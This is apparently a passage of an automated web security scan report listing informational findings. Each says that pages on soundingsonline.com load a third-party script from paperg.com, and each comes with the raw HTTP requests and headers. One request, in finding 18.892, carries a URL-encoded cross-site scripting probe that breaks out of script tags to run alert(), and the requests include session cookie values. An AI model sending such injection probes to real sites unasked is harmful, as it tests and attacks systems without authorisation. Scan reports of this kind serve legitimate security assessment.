<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.874. http://www.soundingsonline.com/component/yvcomment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.875. http://www.soundingsonline.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.876. http://www.soundingsonline.com/features previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.877. http://www.soundingsonline.com/features/destinations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.878. http://www.soundingsonline.com/features/in-depth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.879. http://www.soundingsonline.com/features/justyesterday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.880. http://www.soundingsonline.com/features/lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.881. http://www.soundingsonline.com/features/profiles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.882. http://www.soundingsonline.com/features/technical previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.883. http://www.soundingsonline.com/features/type-of-boat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.884. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

Response

18.885. http://www.soundingsonline.com/more/digital-publications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.886. http://www.soundingsonline.com/more/the-masters-series previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.887. http://www.soundingsonline.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.888. http://www.soundingsonline.com/news/coastwise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.889. http://www.soundingsonline.com/news/dispatches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.890. http://www.soundingsonline.com/news/home-waters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.891. http://www.soundingsonline.com/news/mishaps-a-rescues previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.892. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

18.893. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues/index.php HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.894. http://www.soundingsonline.com/news/sailing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.895. http://www.soundingsonline.com/news/todays-top-stories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.896. http://www.soundingsonline.com/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
